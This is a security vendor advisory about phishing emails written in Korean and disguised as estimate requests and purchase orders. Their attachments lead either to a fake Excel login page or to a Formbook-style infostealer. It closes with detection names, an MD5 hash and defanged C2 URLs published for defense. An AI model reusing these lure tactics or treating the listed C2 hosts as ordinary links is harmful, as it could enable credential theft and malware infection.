Received Estimate/Purchase Order Email? Take Caution When Opening Them!

With the start of 2021, malicious emails disguised as business emails are being discovered as numerous companies have started their business. Thus, users must remain vigilant when opening email. The discovered attacks used e-mails disguised as business-related content, such as ‘estimate request’ or ‘purchase orders,’ with malicious files attached. Upon running the attachment file, the user either gets directed to a phishing site that requires account information, or gets infected with info theft malware. 

In January and February this year, ASEC has discovered numerous cases of e-mails disguised as ‘estimate request’ or ‘purchase order’ to attempt to steal user’s info. The email was written in quite fluent Korean, and it had the phrase ‘Please check the attached file.’ written in Korean to prompt the user to run the attachment file. Also, the attacker impersonated a certain employee and used their signature to avoid any suspicion. Below are two of the discovered attack cases. 

1. Malicious Email Disguised as Estimate Request

In January this year, a malicious e-mail with a title, ‘Estimate Request’ was discovered. The email had a phrase written in Korean saying ‘Please refer to the purchase order attached for product delivery.’ The attacker attached 2 malicious HTML files to this email: ‘Purchase order.html’ and ‘Request for PO.html.’ 

Upon running the HTML attachment, the user gets directed to a phishing site that is designed similar to an excel file shown in the figure below. If the user gets deceived by the excel page, and enters own email address and its password, the entered information gets delivered immediately to the attacker.

Phishing site disguised as an excel file

2. Malicious E-mail Disguised as a Purchase Order/Estimate

In February this year, malicious e-mails with titles, ‘Regarding Specifications and Estimate Request’and ‘Regarding the Purchase Orders on Exports to China’ were discovered one after another. Both of these two emails used fluent Korean and detailed email signatures to avoid any suspicions. 

Once the user downloads the attached file, extracts the file, and runs the executable file (.exe), the downloader’s PC gets infected with malware. Infection may result to theft of the user’s key log info and user account info saved in the web browser.

Currently, AhnLab’s V3 products are blocking the malware and phishing site above.

To reduce the damage by such malware, users must: ▲Refrain from running executable files/URL attached to e-mails from unknown senders, ▲Apply the latest security patches for OS, internet browsers (IE, Chrome, Firefox, etc.), and programs such as Office SW, ▲Update vaccine to the latest version at all time, activate real-time scanning, etc.

Hayoung Yang, team manager of the Analysis team at AhnLab, stated that “employees that handle related business often receive similar e-mails to these, making them vulnerable to such a malware if they do not remain vigilant enough. Leaked account information and user info can be used for targeted in the next round of attack. Therefore, it is important to take extra caution and check the sender of the e-mail along with the attachment file, and make sure not to run any attachments or URL from unknown sources.”

AhnLab’s anti-malware solution V3 Lite detects and blocks this malware using the aliases below.

[File Detection]

Malware/Win32.RL_Generic.C4310220

[Memory Detection]

Trojan/Win.Formbook.XM52

[Behavior Detection]

Malware/MDP.Injection.M3509

[IOC Info]

  • MD5 : 85f52fdf0f7ef9b3deb19fa2daef41df
  • hxxp://www.searko.com/gtl/ (Real C2)
  • hxxp://www.9dgevjb.net/gtl/ (Fake C2)
  • hxxp://www.ndjamua.com/gtl/ (Fake C2)
  • hxxp://www.rnshaircare.com/gtl/ (Fake C2)
  • hxxp://melhoresradios.com/gtl/ (Fake C2)

Categories:Others

0 0 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments